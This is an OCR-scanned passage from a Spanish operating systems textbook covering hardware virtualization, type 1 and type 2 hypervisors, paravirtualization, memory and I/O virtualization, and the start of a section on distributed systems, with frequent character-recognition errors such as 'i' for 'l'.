sensibies dei 386 si se ejecutaba en modo de usuario. Por ejempio, ia instrucción popf sustituye 
ei registro de banderas, que modifica ei bit que habiiita/deshabiiita ias interrupciones. En modo de 
usuario, este bit simpiemente no se modifica. Como consecuencia, ei 386 y sus sucesores no se po¬ 
dían virtuaiizar, por io que no podían soportar un hipervisor de tipo 1. 

En reaiidad ia situación es un poco peor de io que se muestra. Además de ios probiemas con 
ias instrucciones que no se pueden atrapar en modo de usuario, hay instrucciones que pueden ieer 
ei estado sensibie en modo de usuario sin producir una interrupción. Por ejempio, en ei Pentium 
un programa puede determinar si se está ejecutando en modo de usuario o en modo de kernei con 
sóio ieer su seiector dei segmento de código. U n sistema operativo que hiciera esto y descubriera 
que se encuentra en modo de usuario podría tomar una decisión incorrecta con base en esta infor¬ 
mación. 

Este probiema se resoivió cuando Intei y AM D introdujeron i a virtuaiización en sus CPU s, em¬ 
pezando en ei 2005. En ias CPU s Intei Core 2 se conoce como VT (Tecnología de virtuaiización); 
eniasCPUsAMD Pacific se conoce como SVM (Máquina virtual segura). A continuación uti- 
iizaremos ei término VT en un sentido genérico. Ambas tecnoiogías se inspiraron en ei trabajo de 
ia IBM Vlvi/370, pero tienen unas cuantas diferencias. La idea básica es crear contenedores en ios 
que se puedan ejecutar máquinas virtuaies. Cuando se inicia un sistema operativo invitado en un 
contenedor, se sigue ejecutando ahí hasta que produce una excepción y se atrapa en ei hipervisor, 
por ejempio, mediante ia ejecución de una instrucción de E/S. Ei conjunto de operaciones que se 
atrapan se controia mediante un mapa de bits de hardware estabiecido por ei hipervisor. Con estas 
extensiones, es posibie utiiizar ei ciásico método de atrapar y emuiar de una máquina virtuai. 


8.3.2 H ipervisores de tipo 1 

La capacidad de virtuaiización es una cuestión importante, por io queia examinaremos con másde- 
taiie. En ia figura 8-26 podemos ver un hipervisor de tipo 1 que soporta una máquina virtuai. Ai 
iguai que todos ios hipervisores de tipo 1, se ejecuta en modo de kernei. La máquina virtuai se eje¬ 
cuta como un proceso de usuario en modo de usuario y, como tai, no puede ejecutar instrucciones 
sensibies. La máquina virtuai ejecuta un sistema operativo invitado que piensa que se encuentra en 
modo de kernei, aunque desde iuego se encuentra en modo de usuario. A éste ie iiamaremos modo 
de kernei virtual. La máquina virtuai también ejecuta procesos de usuario, ios cuai es creen que se 
encuentran en modo de usuario (y en reaiidad así es). 
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Figura 8-26. Cuando el sistema operativo en una máquina virtuai ejecuta una instruc¬ 
ción que sóio se puede ejecutar en modo de kernei, se atrapa en ei hipervisor si hay tec- 
noiogía de virtuaiización presente. 


¿Oué ocurre cuando el sistema operativo (el cual cree que se encuentra en modo de kernel) eje¬ 
cuta una instrucción sensible (una que sólo se permite en modo de kernel)? En las CPUs sin VT, la 
instrucción falla y por lo general también lo hace el sistema operativo. Esto hace que la verdadera 
virtuaiización sea imposible. Sin duda podríamos argumentar que todas las instrucciones sensibles 
siempre se deben atrapar al ejecutarse en modo de usuario, pero esa no es la forma en que trabaja¬ 
ba el 386 y sus sucesores que no utilizaban la tecnología VT. 

En las CPUs con VT, cuando el sistema operativo invitado ejecuta una instrucción sensible se 
produce una interrupción en el kernel, como se muestra en la figura 8-26. Así, el hipervisor puede 
inspeccionar la instrucción para ver si el sistema operativo anfitrión la emitió en la máquina virtual, 
o si fue un programa de usuario en la máquina virtual. En el primerease, hace las preparaciones pa¬ 
ra que se ejecute la instrucción; en el segundo caso, emula lo que haría el hardware real al confron¬ 
tarlo con una instrucción sensible que se ejecuta en modo de usuario. Si la máquina virtual no tiene 
VT, por lo general la instrucción se ignora: si tiene VT, se atrapa en el sistema operativo invitado 
que se ejecuta en la máquina virtual. 

8.3.3 Hipervisoresdetipo 2 

El proceso de crear un sistema de máquina virtual es bastante simple cuando hay VT disponible, 
pero ¿qué hacían las personas antes de eso? Sin duda, no se podría ejecutar un sistema operativo 
completo en una máquina virtual debido a que sólo se ignorarían (algunas de) las instrucciones 
sensibles, y el sistema fallaría. En vez de ello, lo que ocurrió fue la invención de lo que ahora se 
conoce como hipervisores de tipo 2, como se muestra en la figura l-29(b). El primero de estos 
hipervisoresfueVMware(AdamsyAgesen, 2006; y WaIdspurger, 2002), el fruto del proyecto de 
investigación DISCO en la Universidad deStanford (Bugnion y colaboradores, 1997). VM warese 
ejecuta como un programa de usuario ordinario encima de un sistema operativo anfitrión como 
Windows o Linux. Cuando se inicia por primera vez, actúa como una computadora que se acaba 
de iniciar y espera encontraren la unidad de CD-ROM un disco que contenga un sistema operativo. 
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Después instala el sistema operativo en su disco virtual (que en realidad sólo es un archivo de 
Windows o Linux), para lo cual ejecuta el programa de instalación que se encuentra en el 
CD-ROM . Una vez que se instala el sistema operativo invitado en el disco virtual, se puede ini¬ 
ciar al ejecutarlo. 

Ahora veamos cómo funciona VM ware con un poco más de detalle. Al ejecutar un programa 
binario del Pentium, que puede obtener del CD-ROM de instalación o del disco virtual, primero ex¬ 
plora el código para buscar bloques básicos: es decir, ejecuciones de instrucciones seguidas que ter¬ 
minan en un salto, una llamada, una interrupción o alguna instrucción que modifica el flujo de 
control. Por definición, ningún bloque básico contiene una instrucción que modifique el contador 
del programa, excepto el último. Se inspecciona el bloque básico para ver si contiene instrucciones 
sensibles (en el sentido de Popek y Goldberg). De ser así, cada una de estas instrucciones se susti¬ 
tuye con una llamada a un procedimiento deVM ware que la maneja. La instrucción final también 
se sustituye con una llamada a VM ware. 

Una vez que se realicen estos pasos, el bloque básico se coloca en la caché de VM ware y des¬ 
pués se ejecuta. Un bloque básico que no contenga instrucciones sensibles se ejecutará con la mis¬ 
ma rapidez bajo VM ware que en la máquina básica (ya que se está ejecutando en esa máquina). 
Las instrucciones sensitivas se atrapan y emulan de esta manera. A esta técnica se le conoce como 

traducción binaria. 

U na vez que el bloque básico haya completado su ejecución, el control se regresa a V M ware, 
que localiza a su sucesor. Si ya se ha traducido el sucesor, se puede ejecutar de inmediato. Si no, 
primero se traduce, se coloca en la caché y después se ejecuta. En un momento dado, la mayor par¬ 
te del programa estará en la caché y se ejecutará casi a la velocidad completa. Se utilizan varias 
optimizaciones: por ejemplo, si un bloque básico termina al saltar (o llamar) a otro, se puede sus¬ 
tituir la instrucción final mediante un salto o llamada directamente al bloque básico traducido, con 
lo cual se elimina toda la sobrecarga asociada con la búsqueda del bloque sucesor. Además, no hay 
necesidad de sustituir las instrucciones sensibles en los programas de usuario: el hardware las ig¬ 
norará de todas formas. 

Ahora debe estar claro por qué funcionan los hipervisores de tipo 2, incluso en hardware que 
no se puede virtualizar: todas las instrucciones sensibles se sustituyen mediante llamadas a proce¬ 
dimientos que emulan estas instrucciones. El verdadero hardware nunca ejecuta las instrucciones 
sensibles que emite el sistema operativo invitado. Se convierten en llamadas al hipervisor, quien a 
su vez las emula. 

Tal vez podríamos esperar que las CPUs con VT tuvieran un rendimiento mucho mayor que las 
técnicas de software que se utilizan en los hipervisores de tipo 2, pero las mediciones muestran otra 
cosa (AdamsyAgesen, 2006). Resulta ser que el método de atrapar y emular que utiliza el hardwa¬ 
re con VT genera muchas interrupciones, y éstas son muy costosas en el hardware moderno, debi¬ 
do a que arruinan las cachés de las CPUs, los TLBs y las tablas de predicción de bifurcación 
internas para la CPU. Por el contrario, cuando las instrucciones sensibles se sustituyen mediante lla¬ 
madas a procedí mi entos de VM ware dentro del proceso que está en ejecución, no se produce sobre¬ 
carga debido a este cambio de contexto. Como muestran Adams y Agesen, algunas veces el 
software vence al hardware, dependiendo de la carga de trabajo. Por esta razón, algunos hiperviso¬ 
res de tipo 1 realizan la traducción binaria por cuestiones de rendimiento, aun cuando el software 
se ejecute de manera correcta sin ella. 


574 


SISTEMAS DE MULTIPLES PROCESADORES 


CAPITULO 8 


8.3.4 Paravirtualización 

Los hipervisores de tipo 1 y tipo 2 funcionan con sistemas operativos invitados que no estén modi¬ 
ficados, pero tienen que hacer un gran esfuerzo por obtener un rendimiento razonabie. Un método 
distinto que se está haciendo popuiar es modificar ei código fuente dei sistema operativo invitado, 
de manera que en vez de ejecutar instrucciones sensibies, reaiiza llamadas al hipervisor. En efec¬ 
to, ei sistema operativo invitado actúa como un programa de usuario que reaiiza iiamadas ai siste¬ 
ma operativo (ei hipervisor). Cuando se utiiiza este método, ei hipervisor debe definir una interfaz 
que consiste en un conjunto de iiamadas a procedimientos que ios sistemas operativos invitados 
puedan utiiizar. Esteconjunto de iiamadas forma en efecto una API (Interfaz de programación de 
aplicaciones), aun cuando es una interfaz para que ia utiiicen ios sistemas operativos invitados, y 
no ios programas de apiicación. 

Si vamos un paso más aiiá, ai eiiminar todas ias instrucciones sensibies dei sistema operativo 
para que sóio haga iiamadas ai hipervisor para obtener servicios dei sistema como ia E/S, hemos 
convertido ai hipervisor en un microkernei como ei de ia figura 1-26. Se dice que un sistema ope¬ 
rativo invitado para ei que se han eiiminado de manera intencionai (aigunas) instrucciones sensi¬ 
bies está paravirtual izado (Barham y coiaboradores, 2003; Whitaker y coiaboradores, 2002). La 
emuiación de instrucciones pecuiiares dei hardware es una tarea desagradabie y que consume mu¬ 
cho tiempo. Requiere una iiamada ai hipervisor, para después emuiar ia semántica exacta de una 
instrucción compiicada. Es mucho mejor tan sóio hacer que ei sistema operativo invitado iiame 
ai hipervisor (o microkernei) para reaiizar ias operaciones de E/S, y así en io sucesivo. La principai 
razón por ia que ios primeros hipervisores sóio emuiaban ia máquina compieta era por ia faita de 
disponibiiidad de código fuente para ei sistema operativo invitado (por ejempio, Windows), o debi¬ 
do a ia gran cantidad de variantes (como Linux). Tai vez en ei futuro se estandarizará iaAPI dei hi- 
pervisor/microkernei y ios próximos sistemas operativos se diseñarán para i i amar a esa API, en vez 
de utilizar instrucciones sensibles. Esto facilitaría el soporte y uso de la tecnología de las máquinas 
virtuales. 

En la figura 8-27 se ilustra la diferencia entre la verdadera virtualización y la paravirtualiza¬ 
ción. Aquí tenemos dos máquinas virtuales que se soportan mediante hardware de VT. A la izquier¬ 
da hay una versión sin modificar de Windows como el sistema operativo invitado. Cuando se 
ejecuta una instrucción sensible, el hardware hace que se atrape en el hipervisor, que a su vez la 
emula y regresa. A la derecha hay una versión de Linux modificada de manera que ya no contiene 
instrucciones sensibles. Así, cuando necesita realizar operaciones de E/S o modificar registros in¬ 
ternos críticos (como el que apunta a las tablas de páginas), realiza una llamada al hipervisor para 
realizar el trabajo, de igual forma que cuando un programa de aplicación hace una llamada al siste¬ 
ma en Linux estándar. 

En la figura 8-27 hemos mostrado que el hipervisor se divide en dos partes separadas por una 
línea punteada. En realidad sólo hay un programa que se ejecuta en el hardware. Una parte de este 
programa es responsable de interpretar las instrucciones sensibles que se atrapan, que en este caso 
son de Windows. La otra parte del programa sólo lleva a cabo las llamadas al hipervisor. En la fi¬ 
gura, la segunda parte del programa se etiqueta como "microkernei". Si el hipervisor sólo ejecuta 
sistemas operativos invitados paravirtual izados, no hay necesidad de emular instrucciones sensibles 
y tenemos un verdadero microkernei que sólo proporciona servicios muy básicos, como despachar 
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Figura 8-27. U n hipervisor que soporta ia virtuaiización verdadera y ia paravirtuaiiza- 
ción. 


procesos y administrar la M M U. El límite entre un hipervisor de tipo 1 y un microkernel es de por 
sí impreciso, y empeorará aún más a medida que los hipervisores adquieran cada vez más funcio¬ 
nalidad y llamadas, según parece. Este tema es controversia!, pero cada vez es más claro que el pro¬ 
grama que se ejecute en modo de kernel en el hardware básico debe ser pequeño y confiable, y debe 
consistir de miles de líneas de código, no de millones de líneas. Varios investigadores han hablado 
sobre este tema (Hand y colaboradores, 2005; Heisery colaboradores, 2006; Hohmuth y colabora¬ 
dores, 2004; Roscoey colaboradores, 2007). 

Al paravirtual izar el sistema operativo invitado, surgen varias cuestiones. En primer lugar, si 
las instrucciones sensibles se sustituyen con llamadas al hipervisor, ¿cómo se puede ejecutar el sis¬ 
tema operativo en el hardware nativo? Después de todo, el hardware no comprende estas llamadas 
al hipervisor. Y en segundo lugar, ¿qué pasa si hay varios hipervisores disponibles en el mercado 
como VMware, el Xen de código fuente abierto (diseñado originalmente por la Universidad de 
Cambridge) y M icrosoftViridian, todos ellos con APIs de hipervisor algo distintas? ¿Cómo se pue¬ 
de modificar el kernel para ejecutarse en todos ellos? 

Amsden y sus colaboradores (2006) han propuesto una solución. En su modelo, el kernel se 
modifica para llamar a ciertos procedimientos especiales cada vez que necesita hacer algo sensible. 
En conjunto, estos procedimientos conocidos como VMI (Virtual Machina Interface, Interfaz de 
máquina virtual) forman una capa de bajo nivel que actúa como interfaz para el hardware o hiper¬ 
visor. Estos procedimientos están diseñados para ser genéricos y no estar enlazados al hardware o 
a un hipervisor en especial. 

E n la figura 8-28 se muestra un ejemplo de esta técnica para una versión paravirtual izada de L i- 
nux, conocida como VM I Linux (VM IL). Cuando VM I Linux se ejecuta en el hardware básico, tie¬ 
ne que vincularse con una biblioteca que emite la instrucción actual (sensible) necesaria para realizar 
el trabajo, como se muestra en la figura 8.28(a). Al ejecutarse en un hipervisor (por ejemplo, en VM - 
ware o Xen), el sistema operativo invitado se vincula con distintas bibliotecas que componen las lla¬ 
madas apropiadas (y distintas) al hipervisor para el hipervisor subyacente. De esta forma, el núcleo 
del sistema operativo sigue siendo portable, amigable para los hipervisores y eficiente. 
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(a) 


(b) 


(c) 


Figura 8-28. VMI Linux ejecutándose en (a) el hardware básico (b)VMware (c)Xen. 


También se han propuesto otras técnicas para la interfaz de la máquina virtual. Una de las más 
populares es paravirtops. Esta idea es similar en concepto a lo que hemos visto antes, pero difie¬ 
re en algunos detalles. 


8.3.5 Virtualización de la memoria 

Hasta ahora sólo hemos tratado con la cuestión sobre cómo virtualizar la CPU. Pero un sistema de 
cómputo tiene más componentes aparte de la CPU. También tiene memoria y dispositivos de E/S. 
Éstos también se tienen que virtualizar. Veamos ahora cómo se hace esto. 

Casi todos los sistemas operativos modernos soportan la memoria virtual, que en esencia es una 
asignación de las páginas en el espacio de direcciones virtuales a las páginas de la memoria física. 
Esta asignación se define mediante tablas de páginas (multinivel). Por lo general la asignación se 
establece en movimiento, al hacer que el sistema operativo establezca un registro de control en la 
CPU que apunte a la tabla de páginas de nivel superior. La virtualización complica de manera con¬ 
siderable la administración de la memoria. 

Por ejemplo, suponga que se está ejecutando una máquina virtual y que el sistema operativo in¬ 
vitado en ella decide asignar sus páginas virtuales 7, 4 y 3 a las páginas físicas 10,11 y 12, respec¬ 
tivamente. Crea tablas de páginas que contienen esta asignación y carga un registro de hardware 
para que apunte a la página de tablas de nivel superior. Esta instrucción es sensible. En una CPU 
con VT, se producirá una interrupción; con VM ware producirá una llamada a un procedimiento de 
VMware; en un sistema operativo paravirtual izado generará una llamada al hipervisor. En aras 
de la simplicidad, vamos a suponer que se atrapa en un hipervisor de tipo 1, pero el problema es el 
mismo en los tres casos. ¿Qué hace ahora el hipervisor? Una solución es asignar las páginas físicas 
10, 11 y 12 a esta máquina virtual y establecer las páginas de tablas actuales para que asignen 
las páginas virtuales 7, 4 y 3 de la máquina virtual para utilizarlas. Hasta ahora todo va bien. 
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Ahora suponga que se inicia una segunda máquina vi rtuai y que asigna sus páginas vi rtuai es 4, 
5 y 6 a ias páginas físicas 10,11 y 12, y que carga ei registro de controi para que apunte a sus ta- 
bias de páginas. Ei hipervisor atrapa ia interrupción, pero ¿qué debe hacer? No puede utiiizar esta 
asignación debido a que ias páginas físicas 10, 11 y 12 ya están en uso. Puede buscar páginas ii- 
bres, por ejempio 20, 21 y 22, y utiiizarias, pero primero tiene que crear nuevas páginas de tabias 
para asignar ios páginas virtuaies 4, 5 y 6 de ia máquina virtuai 2 a ias páginas físicas 20, 21 y 22. 
Si se inicia otra máquina virtuai y trata de utiiizar ias páginas físicas 10, 11 y 12, tiene que crear 
una asignación para eiia. En generai, para cada máquina virtuai ei hipervisor necesita crear una ta¬ 
bla de páginas oculta (shadow) que asigne ias páginas virtuaies que utiiiza i a máquina virtuai a 
ias páginas actuaies que ei hipervisor ie otorgó. 

Lo que es peor aún, cada vez que ei sistema operativo invitado cambie sus tabias de páginas, 
ei hipervisor también tiene que cambiar ias tabias de páginas ocuitas. Por ejempio, si ei SO invita¬ 
do reasigna ia página virtuai 7 a io que ve como ia página virtuai 200 (en vez de 10), ei hipervisor 
tiene que saber acerca de este cambio. Ei probiema esqueei sistema operativo invitado puede cam¬ 
biar sus tabias de páginas con sóio escribir en ia memoria. No se requieren operaciones sensibies, 
por io que ei hipervisor ni siquiera se entera sobre ei cambio y, en definitiva, no puede actuaiizar 
ias tabias de páginas ocuitas que utiiiza ei hardware actuai. 

Una posibiesoiución (pero burda) es queei hipervisor iieveei registro sobre cuái página en ia 
memoria virtuai dei invitado contiene ia tabia de páginas de nivei superior. Puede obtener esta in¬ 
formación ia primera vez queei invitado intente cargar ei registro de software ai que apunta, ya que 
esta instrucción es sensibie y produce una interrupción. Ei hipervisor puede crear una tabia de pá¬ 
ginas ocuita en este punto, y también puede asignar ia tabia de páginas de nivei superior y ias ta¬ 
bias de páginas a ias que apunta para que sean de sóio iectura. Los intentos subsiguientes dei 
sistema operativo invitado por modificar cuaiquiera de estas páginas producirán un faiio de página 
y, en consecuencia, otorgarán ei controi ai hipervisor, que puede anaiizar ei fiujo de instrucciones, 
averiguar qué es io que está tratando de hacer ei SO invitado y actuaiizar ias tabias de páginas ocui¬ 
tas según sea necesario. No es bonito, pero se puede hacer en principio. 

Ésta es un área en ia que ias futuras versiones deVT podrían ofrecer asistencia ai reaiizar una 
asignación de dos niveies en ei hardware. Primero, ei hardware podría asignar ia página virtuai a 
ia idea que tiene ei invitado sobre ia página física, y después podría asignar esa dirección (que ei 
hardware ve como una dirección virtuai) a ia dirección física, todo sin que se produzcan interrup¬ 
ciones. De esta forma no habría que marcar ninguna tabia de páginas como de sóio iectura, y ei 
hipervisor simpiemente tendría que proveer una asignación entre ei espacio de direcciones virtua¬ 
ies de cada invitado y ia memoria física. Ai cambiar de máquinas virtuaies, sóio cambiaría esta 
asignación de ia misma forma en que un sistema operativo normai cambia ia asignación ai cam¬ 
biar de procesos. 

En un sistema operativo paravi rtuai izado, ia situación es diferente. Aquí, ei SO paravi rtuai iza¬ 
do en ei invitado sabe que cuando termine de cambiar ia tabia de páginas de cierto proceso, debe 
informar ai hipervisor. En consecuencia, primero cambia ia tabia de páginas por compieto y des¬ 
pués emite una iiamada ai hipervisor para indicarie sobre ia nueva tabia de páginas. Así, en vez de 
obtener un faiio de protección en cada actuaiización a ia tabia de páginas, hay una iiamada ai hiper¬ 
visor cuando se han reaiizado todas ias actuaiizaciones. Ésta es una manera más eficiente de hacer 
ias cosas. 
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8.3.6 Virtualización déla E/S 

Ya que analizamos la virtualización de la CPU y de la memoria, el siguiente paso es examinar la 
virtualización de la E/S. Por lo general, el sistema operativo invitado empezará con un sondeo del 
hardware para averiguar qué tipos de dispositivos de E/S están conectados. Estas sondas produci¬ 
rán interrupciones en el hipervisor. ¿Oué debe hacer el hipervisor? Un método es que reporte de 
vuelta que los discos, las impresoras y demás dispositivos son los que realmente tiene el hardware. 
Después el invitado cargará drivers para estos dispositivos y tratará de utilizarlos. Cuando los dri- 
vers de los dispositivos traten de realizar operaciones de E/S, leerán y escribirán en los registros de 
dispositivo del hardware del dispositivo correspondiente. Estas instrucciones son sensibles y 
se atraparán en el hipervisor, que podría entonces copiar los valores necesarios que entran y salen 
de los registros de hardware, según sea necesario. 

Pero aquí también tenemos un problema. Cada SO invitado piensa que posee toda una parti¬ 
ción de disco, y puede haber muchas máquinas virtuales más (cientos) que particiones de disco. La 
solución usual es que el hipervisor cree un archivo o región en el disco para el disco físico de cada 
máquina virtual. Como el SO invitado está tratando de controlar un disco que el hardware real tie¬ 
ne (y que el hipervisor conoce), puede convertir el número de bloque al que se está accediendo en 
un desplazamiento en el archivo o región que se está utilizando para el almacenamiento, y así pue¬ 
de realizar la operación de E/S. 

También es posible que el disco que utiliza el invitado sea diferente del disco real. Por ejem¬ 
plo, si el disco actual es un disco nuevo de alto rendimiento (o RAID) con una nueva interfaz, el hi¬ 
pervisor podría anunciar al SO invitado que tiene un simple disco IDE antiguo, para permitirle que 
instale un driver de disco IDE. Cuando este driver emite los comandos de disco IDE, el hipervisor 
los convierte en comandos para controlar el nuevo disco. Esta estrategia se puede utilizar para ac¬ 
tualizar el hardware sin tener que cambiar el software. De hecho, esta habilidad de las máquinas 
virtuales para reasignar dispositivos de hardware fue una de las razones por las que la VM/370 se 
hizo popular: las empresas querían comprar hardware nuevo y más veloz, pero no querían cambiar 
su software. Esto fue posible gracias a la tecnología de las máquinas virtuales. 

Otro problema de E/S que se debe resolver de alguna manera es el uso de DMA, que utiliza di¬ 
recciones de memoria absolutas. Como podría esperarse, el hipervisor tiene que intervenir aquí y 
reasignar las direcciones antes de que inicie el DMA. Sin embargo, está empezando a aparecer el 
hardware con una M M U de E/S, que virtualiza la E/S de la misma forma en que la M M U virtuali- 
za la memoria. Este hardware elimina el problema del DM A. 

Un método distinto para manejar la E/S es dedicar una de las máquinas virtuales para que eje¬ 
cute un sistema operativo estándar y que le refleje todas las llamadas a la E/S de las demás máqui¬ 
nas virtuales. Este método se mejora cuando se utiliza la paravirtualización, por lo que el comando 
que se emite al hipervisor en realidad indica lo que el SO invitado desea (por ejemplo, leer el bloque 
1403 del disco 1), en vez de que sea una serie de comandos para escribir a los registros de disposi¬ 
tivo, en cuyo caso el hipervisor tiene que jugar a ser Sherlock Holmes para averiguar qué es lo que 
está tratando de hacer. Xen utiliza este método para la E/S, y la máquina virtual que se encarga de 
la E/S se llama dominio 0. 

La virtualización de la E/S es un área en la que los hipervisores de tipo 2 tienen una ventaja 
práctica sobre los hipervisores de tipo 1: el sistema operativo anfitrión contiene los drivers de dis- 
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positivos para todos ios extraños y maraviiiosos dispositivos de E/S conectados a ia computadora. 
Cuando un programa de apiicación intenta acceder a un dispositivo E/S extraño, ei código traduci¬ 
do puede iiamar ai driver de dispositivo existente para que reaiice ei trabajo. Con un hipervisor de 
tipo 1, ei hipervisor debe contener ei driver o debe reaiizar una ñamada a un driver en ei dominio 
0, que es aigo simiiar a un sistema operativo anfitrión. A medida que madure ia tecnoiogía de ias 
máquinas virtuaies, es probabie que ei futuro hardware permita que ios programas de apiicación ac¬ 
cedan ai hardware directamente de una manera segura, io cuai significa que ios drivers de disposi¬ 
tivos podrán vincuiarse directamente con ei código de ia apiicación, o se podrán coiocar en 
servidores separados en modo de usuario, con io cuai se eiiminará ei probiema. 


8.3.7 Dispositivos virtuales 

L as máquinas virtuaies ofrecen una interesante soiución a un probiema que desde hace mucho tiem¬ 
po perturba a ios usuarios, en especiai a ios dei software de código fuente abierto: cómo instaiar 
nuevos programas de apiicación. Ei probiema es que muchas apiicaciones dependen de otras tantas 
apiicaciones y bibi i otecas, que a su vez dependen de muchos otros paquetes de software, y así en 
io sucesivo. Lo que es más, puede haber dependencias en versiones específicas de ios compiiado- 
res, ienguajes de secuencias de comandos y en ei sistema operativo. 

Ahora que están disponibies ias máquinas virtuaies, un desarroiiador de software puede cons¬ 
truir con cuidado una máquina virtuai, cargada con ei sistema operativo, compiiadores, bibiiotecas 
y código de apiicación requeridos, y congeiar ia unidad compieta, iista para ejecutarse. Esta ima¬ 
gen de ia máquina virtuai se puede coiocar en un CD-ROM o en un sitio Web para que ios Chentes 
ia instaien o descarguen. Este método impiica quesóio ei desarroiiador de software ti ene que cono¬ 
cer todas ias dependencias. Los Chentes reciben un paquete compieto que funciona de verdad, sin 
importar qué sistema operativo estén ejecutando ni qué otro software, paquetes y bibiiotecas tengan 
instaiados. A estas máquinas virtuaies "empaquetadas y iistas para usarse" se Íes conoce común¬ 
mente como dispositivos virtuales. 


8.3.8 M áquinas virtuales en C PUs de multinúcleo 

La combinación de ias máquinas virtuaies y ias CPUs de muitinúcieo abre todo un nuevo mundo, 
en donde ei número de CPUs disponibies se puede estabiecer en ei software. Por ejempio, si hay 
cuatro núcieos y cada uno de eiios se puede utiiizar para ejecutar, digamos, hasta ocho máquinas 
virtuaies, se puede configurar una soia CPU (escritorio) como una muiticomputadora de 32 nodos 
si es necesario, pero también puede tener menos CPUs dependiendo de ias necesidades dei softwa¬ 
re. Nunca antes había sido posibie que un diseñador de apiicaciones seieccionara primero cuántas 
CPUs quiere, para después escribir ei software de manera acorde. Sin duda, esto representa una nue¬ 
va fase en ia computación. 

Aunque todavía no es tan común, sin duda es concebibie que ias máquinas virtuaies pudieran 
compartir ia memoria. Todo io que hay que hacer es asignar ias páginas físicas en ios espacios 
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direcciones de varias máquinas virtuaies. Si se puede hacer esto, una soia computadora se puede 
convertir en un muitiprocesador virtuai. Como todos ios núcieos en un chip muitinúcieo comparten 
ia misma RAM , un soio chip con cuádrupie núcieo se podría configurar fáciimente como un mui- 
tiprocesador de 32 nodos o como una muiticomputadora de 32 nodos, según sea necesario. 

La combinación de muitinúcieo, máquinas virtuaies, hipervisores y microkerneis va a cambiar 
de manera radicai ia forma en que ias personas piensan sobre ios sistemas de cómputo. Ei software 
actuai no puede iidiar con ia idea de que ei programador determine cuántas CPUs se necesitan, si se 
deben estabiecer como una muiticomputadora o como un muiti procesador, y qué papei desempeñan 
ios kerneis mínimos de un tipo u otro. Ei software futuro tendrá que iidiar con estas cuestiones. 

8.3.9 Cuestiones sobre licencias 

Las iicencias de ia mayoría dei software son por cada CPU. En otras paiabras, cuando usted com¬ 
pra un programa, tiene ei derecho de ejecutado sóio en una CPU. ¿Acaso este contrato ie otorga ei 
derecho de ejecutar ei software en varias máquinas virtuaies, todas ias cuaies se ejecutan en ia mis¬ 
ma máquina? M uchos distribuidores de software están aigo inseguros sobre io que deben hacer 
aquí. 

Ei probiema es mucho peor en ias empresas que tienen una iicencia que Íes permite tener n má¬ 
quinas ejecutando ei software ai mismo tiempo, en especiai cuando aumenta y disminuye ia deman¬ 
da de ias máquinas virtuaies. 

En aigunos casos, ios distribuidores de software han coiocado una ciáusuia expiícita en ia ii¬ 
cencia, en ia que se prohíbe ai concesionario ejecutar ei software en una máquina virtuai o en una 
máquina virtuai no autorizada. Está por verse si aiguna de estas restricciones será váiida en una cor¬ 
te y ia manera en que ios usuarios responderán a eiias. 


8.4SISTEMAS DISTRIBUIDOS 

Ahora que hemos compietado nuestro estudio de ios muiti procesadores, ias muiticomputadoras y 
ias máquinas virtuaies, es tiempo de anaiizar ei úitimo tipo de sistema de múitipies procesadores: 
ei sistema distribuido. Estos sistemas son simiiares a ias muiticomputadoras en cuanto a que cada 
nodo tiene su propia memoria privada, sin memoria física compartida en ei sistema. Sin embargo, 
ios sistemas distribuidos tienen un acopiamiento aún más débii que ias muiticomputadoras. 

Para empezar, ios nodos de una muiticomputadora comúnmente tienen una CPU, RAM , una in¬ 
terfaz de red y tai vez un disco duro para ia paginación. Por ei contrario, cada nodo en un sistema 
distribuido es una computadora compieta, con todo un compiemento de periféricos. A demás, ios no¬ 
dos de una muiticomputadora por io generai están en un soio cuarto, de manera que se pueden co¬ 
municar mediante una red dedicada de aita veiocidad, mientras que ios nodos de un sistema 
distribuido pueden estar esparcidos en todo ei mundo. Por úitimo, todos ios nodos de una compu¬ 
tadora ejecutan ei mismo sistema operativo, comparten un soio sistema de archivos y están bajo una 
administración común, mientras que cada uno de ios nodos de un sistema distribuido puede ejecu¬ 
tar un sistema operativo diferente, cada uno con su propio sistema de archivos, y pueden estar 
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bajo una administración diferente. Un ejempio típico de una muiticomputadora es: 512 nodos en un 
soio cuarto en una empresa o universidad, trabajando (por decir) en ei modeiado farmacéutico, 
mientras que un sistema distribuido típico consiste en miies de máquinas que cooperan iibremente 
a través de Internet. En la figura 8-29 se comparan los multiprocesadores, las multicomputadoras y 
los sistemas distribuidos en los puntos antes mencionados. 


Elemento 

Multiprocesador 

Muiticomputadora 

Sistema distribuido 

Configuración de nodo 

CPU 

CPU, RAM, interfaz 

de red 

Computadora 

completa 

Periféricos de nodo 

Todos compartidos 

Compartidos, excepto tal 

vez el disco 

Conjunto completo por 

nodo 

Ubicación 

Mismo bastidor 

Mismo cuarto 

Posiblemente a nivel 

mundial 

Comunicación entre nodos 

RAM compartida 

Interconexión dedicada 

Red tradicional 

Sistemas operativos 

Uno, compartido 

Varios, igual 

Posiblemente todos 

distintos 

Sistemas de archivos 

Uno, compartido 

Uno, compartido 

Cada nodo tiene el 

suyo 

Administración 

Una organización 

Una organización 

Muchas 

organizaciones 


Figura 8-29. Comparación de los tres tipos de sistemas de múltiples CPUs. 


Es evidente que las multicomputadoras se encuentran en la parte media de esta métrica. Una 
pregunta interesante sería: "¿Son las multicomputadoras más parecidas a los multiprocesadores o a 
los sistemas distribuidos?". Aunque parezca mentira, la respuesta depende en gran parte de la pers¬ 
pectiva de cada quien. Desde una perspectiva técnica, los multiprocesadores tienen memoria com¬ 
partida y los otros dos sistemas no. Esta diferencia produce distintos modelos de programación y 
diferentes pensamientos. Sin embargo, desde la perspectiva de las aplicaciones, los multiprocesa¬ 
dores y las multicomputadoras son sólo bastidores de equipo en un cuarto de máquinas. Ambos sis¬ 
temas se utilizan para resolver problemas que requieren cálculos intensivos, mientras que un 
sistema distribuido que conecta computadoras a través de Internet está por lo general mucho más 
involucrado en la comunicación que en la computación, y se utiliza de una manera distinta. 

Hasta cierto grado, el débilmente acoplamiento de las computadoras en un sistema distribuido 
es tanto una ventaja como una desventaja. Es una ventaja debido a que las computadoras se pueden 
utilizar para una gran variedad de aplicaciones, pero también es una desventaja ya que es difícil pro¬ 
gramar estas aplicaciones debido a que no existe un modelo subyacente común. 

Las aplicaciones comunes de Internet incluyen el acceso a computadoras remotas (mediante el uso 
deteinet, ssh y riogin), el acceso a información remota (mediante el uso de World Wide Web y FTP, el 
Protocolo de Transferencia de Archivos), la comunicación de persona a persona (mediante el correo 
